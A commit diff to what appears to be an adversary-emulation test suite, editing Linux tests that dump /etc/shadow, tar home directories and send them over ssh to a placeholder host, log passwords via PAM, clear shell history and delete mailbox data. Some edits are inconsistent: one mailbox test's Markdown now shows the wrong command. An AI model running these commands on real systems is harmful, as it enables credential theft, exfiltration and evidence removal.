Fix tests to support automations

atomics/T1003.008/T1003.008.md

@@ -157,7 +157,7 @@ Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
 
 ```sh
 unamestr=$(uname)
-if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; fi
+if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
 ```
 
 #### Cleanup Commands:

atomics/T1003.008/T1003.008.yaml

@@ -71,7 +71,7 @@ atomic_tests:
   executor:
     command: | 
       unamestr=$(uname)
-      if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > ${output_file}; fi
+      if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
     cleanup_command: |
       rm -f #{output_file}
     name: sh

atomics/T1040/T1040.md

@@ -59,20 +59,13 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 
 
 
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | string | ens33|
-
-
 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
 
 
 ```bash
-tcpdump -c 5 -nnni #{interface}
-tshark -c 5 -i #{interface}
+real_interface=$(netstat -i | tail -n +3 | awk '{print $1}' | grep -E "ens|eth")
+tcpdump -c 5 -nnni ${real_interface}
+tshark -c 5 -i ${real_interface}
 ```
 
 

atomics/T1040/T1040.yaml

@@ -9,11 +9,6 @@ atomic_tests:
     Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
   supported_platforms:
   - linux
-  input_arguments:
-    interface:
-      description: Specify interface to perform PCAP on.
-      type: string
-      default: ens33
   dependency_executor_name: bash
   dependencies:
   - description: |
@@ -24,8 +19,9 @@ atomic_tests:
       (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
   executor:
     command: |
-      tcpdump -c 5 -nnni #{interface}
-      tshark -c 5 -i #{interface}
+      real_interface=$(ip -o link show | awk -F': ' '{print $2}' | grep ens)
+      tcpdump -c 5 -nnni ${real_interface}
+      tshark -c 5 -i ${real_interface}
     name: bash
     elevation_required: true
 - name: Packet Capture FreeBSD using tshark or tcpdump

atomics/T1046/T1046.yaml

@@ -173,26 +173,30 @@ atomic_tests:
   description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
   supported_platforms:
   - containers
+  input_arguments:
+    dockerfile_path:
+      description: Path of the dockerfile.
+      type: string
+      default: PathToAtomicsFolder/T1046/src/
   dependency_executor_name: sh
   dependencies:
   - description: Verify docker is installed.
     prereq_command: |
       which docker
     get_prereq_command: |
       if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
-
   - description: Verify docker service is running.
     prereq_command: |
       sudo systemctl status docker  --no-pager
     get_prereq_command: |
       sudo systemctl start docker
   executor:
     command: |-
-      docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
+      docker build -t t1046 #{dockerfile_path}
       docker run --name t1046_container  -d -t t1046
-      docker exec t1046_container ./test.sh
+      docker exec t1046_container /scan.sh
     cleanup_command: |-
-      docker stop t1046_container
+      docker stop t1046_container && docker rm t1046_container
       docker rmi -f t1046
     name: sh
 - name: Port-Scanning /24 Subnet with PowerShell

atomics/T1048/T1048.md

@@ -84,7 +84,7 @@ Upon successful execution, tar will compress /Users/* directory and password pro
 
 
 ```sh
-tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
+tar czpf - /home/* | openssl des3 -salt -pass pass:#{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
 ```
 
 

atomics/T1048/T1048.yaml

@@ -47,7 +47,7 @@ atomic_tests:
       default: target.example.com
   executor:
     command: |
-      tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
+      tar czpf - /home/* | openssl des3 -salt -pass pass:#{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
     name: sh
 - name: DNSExfiltration (doh)
   auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48

atomics/T1053.006/T1053.006.md

@@ -38,7 +38,7 @@ This test creates Systemd service and timer then starts and enables the Systemd
 | systemd_timer_name | Name of systemd service timer | string | art-timer.timer|
 
 
-#### Attack Commands: Run with `bash`! 
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
 
 
 ```bash

atomics/T1053.006/T1053.006.yaml

@@ -26,6 +26,7 @@ atomic_tests:
       type: string
       default: art-timer.timer
   executor:
+    elevation_required: true
     command: |
       echo "[Unit]" > #{path_to_systemd_service}
       echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}

atomics/T1056.001/T1056.001.md

@@ -317,7 +317,7 @@ cp -v /etc/pam.d/sshd /tmp/
 echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
 systemctl restart sshd
 systemctl restart auditd
-ssh #{user_account}@localhost 
+ssh #{user_account}@localhost -o StrictHostKeyChecking=no
 whoami
 sudo su
 whoami
@@ -369,7 +369,7 @@ The linux audit tool auditd can be used to capture 32 and 64 bit command executi
 ```sh
 auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
 auditctl -a always,exit -F arch=b32 -S execve -k CMDS
-whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
+whoami; ausearch -i --start $(date +"%m/%d/%y %H:%M:%S")
 ```
 
 #### Cleanup Commands:

atomics/T1056.001/T1056.001.yaml

@@ -172,7 +172,7 @@ atomic_tests:
       echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
       systemctl restart sshd
       systemctl restart auditd
-      ssh #{user_account}@localhost 
+      ssh #{user_account}@localhost -o StrictHostKeyChecking=no
       whoami
       sudo su
       whoami
@@ -200,7 +200,7 @@ atomic_tests:
     command: |
       auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
       auditctl -a always,exit -F arch=b32 -S execve -k CMDS
-      whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") 
+      whoami; ausearch -i --start $(date +"%m/%d/%y %H:%M:%S")
     cleanup_command: |
       systemctl restart auditd
 - name: MacOS Swift Keylogger

atomics/T1059.004/T1059.004.yaml

@@ -219,6 +219,12 @@ atomic_tests:
       if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
     get_prereq_command: |
       which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
+  - description: |
+      Check if output  is installed on the machine.
+    prereq_command: |
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
   executor:
     name: sh
     elevation_required: false

atomics/T1069.001/T1069.001.md

@@ -250,7 +250,7 @@ docker exec t1069_container ./test.sh
 
 #### Cleanup Commands:
 ```sh
-docker stop t1069_container
+docker stop t1069_container && docker rm t1069_container
 docker rmi -f t1069
 ```
 

atomics/T1069.001/T1069.001.yaml

@@ -123,6 +123,6 @@ atomic_tests:
       docker run --name t1069_container  -d -t t1069
       docker exec t1069_container ./test.sh
     cleanup_command: |-
-      docker stop t1069_container
+      docker stop t1069_container && docker rm t1069_container
       docker rmi -f t1069
     name: sh

atomics/T1070.003/T1070.003.md

@@ -251,7 +251,7 @@ Clears the history and disable bash history logging of the current shell and fut
 
 
 
-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `bash`! 
 
 
 ```sh

atomics/T1070.003/T1070.003.yaml

@@ -109,7 +109,7 @@ atomic_tests:
       sed -i 's/set +o history//g' ~/.bashrc
       . ~/.bashrc
       set -o history
-    name: sh
+    name: bash
 - name:  Use Space Before Command to Avoid Logging to History
   auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6
   description: |

atomics/T1070.004/T1070.004.md

@@ -134,8 +134,6 @@ Use the `shred` command to overwrite the temporary file and then delete it
 
 
 
-
-
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
@@ -149,6 +147,16 @@ Use the `shred` command to overwrite the temporary file and then delete it
 shred -u #{file_to_shred}
 ```
 
+##### Description: Check if file already exists
+##### Check Prereq Commands:
+```sh
+if [ -f "#{file_to_shred}" ]; then echo "File exists"; else echo "File does NOT exists"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+touch #{file_to_shred}
+echo "test" > #{file_to_shred}
+```
 
 
 

atomics/T1070.004/T1070.004.yaml

@@ -66,6 +66,14 @@ atomic_tests:
       description: Path of file to shred
       type: path
       default: /tmp/victim-shred.txt
+  dependencies:
+  - description: |
+      Check if file already exists
+    prereq_command: |
+      if [ -f "#{file_to_shred}" ]; then echo "File exists"; else echo "File does NOT exists"; exit 1; fi
+    get_prereq_command: |
+      touch #{file_to_shred}
+      echo "test" > #{file_to_shred}
   executor:
     command: |
       shred -u #{file_to_shred}

atomics/T1070.008/T1070.008.md

@@ -74,14 +74,7 @@ Copies and deletes mail data on Linux
 
 
 ```bash
-mkdir -p /var/spool/mail/copy
-for file in /var/spool/mail/*; do
-  if [ "$(basename "$file")" != "copy" ]
-  then
-    cp -R "$file" /var/spool/mail/copy/
-  fi
-done
-rm -rf /var/spool/mail/copy/*
+mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*
 ```
 
 #### Cleanup Commands:
@@ -181,16 +174,7 @@ Copies and modifies mail data on Linux
 
 
 ```bash
-mkdir -p /var/spool/mail/copy
-for file in /var/spool/mail/*; do
-  if [ "$(basename "$file")" != "copy" ]
-  then
-    cp -R "$file" /var/spool/mail/copy/
-    if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then
-      echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"
-    fi
-  fi
-done
+mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*
 ```
 
 #### Cleanup Commands:

atomics/T1070.008/T1070.008.yaml

@@ -2,7 +2,7 @@ attack_technique: T1070.008
 display_name: 'Email Collection: Mailbox Manipulation'
 atomic_tests:
 - name: Copy and Delete Mailbox Data on Windows
-  auto_generated_guid: d29f01ea-ac72-4efc-8a15-bea64b77fabf
+  auto_generated_guid: d29f01ea-ac72-4efc-8a15-bea64b77fabf
   description: |
     Copies and deletes mail data on Windows
   supported_platforms:
@@ -18,28 +18,21 @@ atomic_tests:
     elevation_required: true
 
 - name: Copy and Delete Mailbox Data on Linux
-  auto_generated_guid: 25e2be0e-96f7-4417-bd16-a4a2500e3802
+  auto_generated_guid: 25e2be0e-96f7-4417-bd16-a4a2500e3802
   description: |
     Copies and deletes mail data on Linux
   supported_platforms:
   - linux
   executor:
     command: |
-      mkdir -p /var/spool/mail/copy
-      for file in /var/spool/mail/*; do
-        if [ "$(basename "$file")" != "copy" ]
-        then
-          cp -R "$file" /var/spool/mail/copy/
-        fi
-      done
-      rm -rf /var/spool/mail/copy/*
+      mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*
     cleanup_command: |
       rm -rf /var/spool/mail/copy
     name: bash
     elevation_required: true
 
 - name: Copy and Delete Mailbox Data on macOS
-  auto_generated_guid: 3824130e-a6e4-4528-8091-3a52eeb540f6
+  auto_generated_guid: 3824130e-a6e4-4528-8091-3a52eeb540f6
   description: |
     Copies and deletes mail data on macOS
   supported_platforms:
@@ -55,7 +48,7 @@ atomic_tests:
     elevation_required: true
 
 - name: Copy and Modify Mailbox Data on Windows
-  auto_generated_guid: edddff85-fee0-499d-9501-7d4d2892e79b
+  auto_generated_guid: edddff85-fee0-499d-9501-7d4d2892e79b
   description: |
     Copies and modifies mail data on Windows
   supported_platforms:
@@ -71,30 +64,21 @@ atomic_tests:
     elevation_required: true
 
 - name: Copy and Modify Mailbox Data on Linux
-  auto_generated_guid: 6d99f93c-da56-49e3-b195-163090ace4f6
+  auto_generated_guid: 6d99f93c-da56-49e3-b195-163090ace4f6
   description: |
     Copies and modifies mail data on Linux
   supported_platforms:
   - linux
   executor:
     command: |
-      mkdir -p /var/spool/mail/copy
-      for file in /var/spool/mail/*; do
-        if [ "$(basename "$file")" != "copy" ]
-        then
-          cp -R "$file" /var/spool/mail/copy/
-          if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then
-            echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"
-          fi
-        fi
-      done
+      mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"; fi; fi; done
     cleanup_command: |
       rm -rf /var/spool/mail/copy
     name: bash
     elevation_required: true
 
 - name: Copy and Modify Mailbox Data on macOS
-  auto_generated_guid: 8a0b1579-5a36-483a-9cde-0236983e1665
+  auto_generated_guid: 8a0b1579-5a36-483a-9cde-0236983e1665
   description: |
     Copies and modifies mail data on macOS
   supported_platforms:

atomics/T1078.003/T1078.003.md

@@ -328,9 +328,7 @@ usermod --lock art
 usermod --expiredate "1" art
 usermod --unlock art
 usermod --expiredate "99999" art
-su art
-whoami
-exit
+su -c whoami art
 ```
 
 #### Cleanup Commands: